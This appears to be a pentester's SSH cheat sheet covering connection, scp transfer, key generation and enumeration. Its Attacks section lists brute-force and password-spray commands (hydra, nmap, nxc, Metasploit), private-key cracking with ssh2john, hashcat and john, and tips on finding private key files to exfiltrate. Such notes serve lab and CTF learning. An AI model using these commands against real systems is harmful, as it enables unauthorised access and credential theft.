22 - SSH

Secure Shell (SSH) is a cryptographic network protocol used to securely access and manage remote systems over an untrusted network. It provides encrypted communication, authentication (such as passwords or keys), and secure command execution, file transfer, and tunnelling capabilities.

Usage

Key authentication cannot be used for network based authentication → limit us to local interaction only.

# Connect via SSH using a password
ssh x7331@10.10.10.1

# Connect via SSH using a private key
chmod 400 id_rsa
ssh -i id_rsa x7331@10.10.10.1

Inline Commands

# Inline command execution
ssh user1@10.10.10.10 -p 2222 'ls /home/user1/'

File Transfer

# Local to remote (upload)
scp file1 user@172.16.10.10:/tmp/file1

# Remote to local (download)
scp user@172.16.10.10:/tmp/file1 ./file1

# Multiple files -> host must end with a directory, i.e., ':~' or ':/'
scp agent.exe proxy x7331@srv02:~ 

If error messages, try -0.

$ scp -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.

$ scp -O -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys

Key Generation

# Generate key pair
$ ssh-keygen -t rsa -f ~/.ssh/id_rsa -N ''

# Add public key to authorized keys
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

# Read private key
$ cat .ssh/id_rsa

Enumeration

# Enuemrate supported authentication methods
nmap -p22 -script=ssh-auth-methods <IP>

# Audit
ssh-audit 192.168.0.24

# Test SSH access
nxc ssh 10.130.434.10 -u x7331 -p Passw0rd123!

Attacks

Brute Force

# BFA
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.0.24:22 -t 4

nmap -p 22 --script ssh-brute potato

nxc ssh 10.130.434.10 -u users.txt -p passwords.txt

$ msfconsole -q
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.57.134
RHOSTS => 192.168.57.134

Password Spray

# Password spray attack
nxc ssh 10.130.434.10 -u users.txt -p Passw0rd123!

Crack Private Keys

# Convert the private key into a hashcat-friendly format
$ ssh2john id_rsa > ssh.hash

# Remove the filename from the file (e.g. id_rsa:)
$ cat ssh.hash
$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>

# Crack the hash (might not work)
$ hashcat -m 22921 ssh.hash ssh.passwords
# This will probably work
$ john --wordlist=ssh.passwords ssh.hash

SSH supports multiple key types, each with a default filename, thus, when trying to exfiltrate one don't just search for id_rsa!

Key Type	Private Key File	Public Key File
RSA	~/.ssh/id_rsa	~/.ssh/id_rsa.pub
ECDSA	~/.ssh/id_ecdsa	~/.ssh/id_ecdsa.pub
ED25519	~/.ssh/id_ed25519	~/.ssh/id_ed25519.pub
DSA (old)	~/.ssh/id_dsa	~/.ssh/id_dsa.pub

• ECDSA and ED25519 are newer and generally faster/smaller than RSA.

• ED25519 is currently the recommended default for many systems (ssh-keygen defaults to it now).

• RSA is still widely supported, but 4096-bit keys are preferred now due to security standards.

PPK to PEM

Convert a Putty user key file (.ppk) to an SSH .pem file.

# Converting PPK to PEM
sudo puttygen key.ppk -O private-openssh -o key.pem
# Assigning the appropriate permissions
sudo chmod 600 key.pem
# Confirming permissions
ls -l key.pem
# Using public key authentication
ssh root@10.10.11.227 -i key.pem

For an example of the above process check Keeper.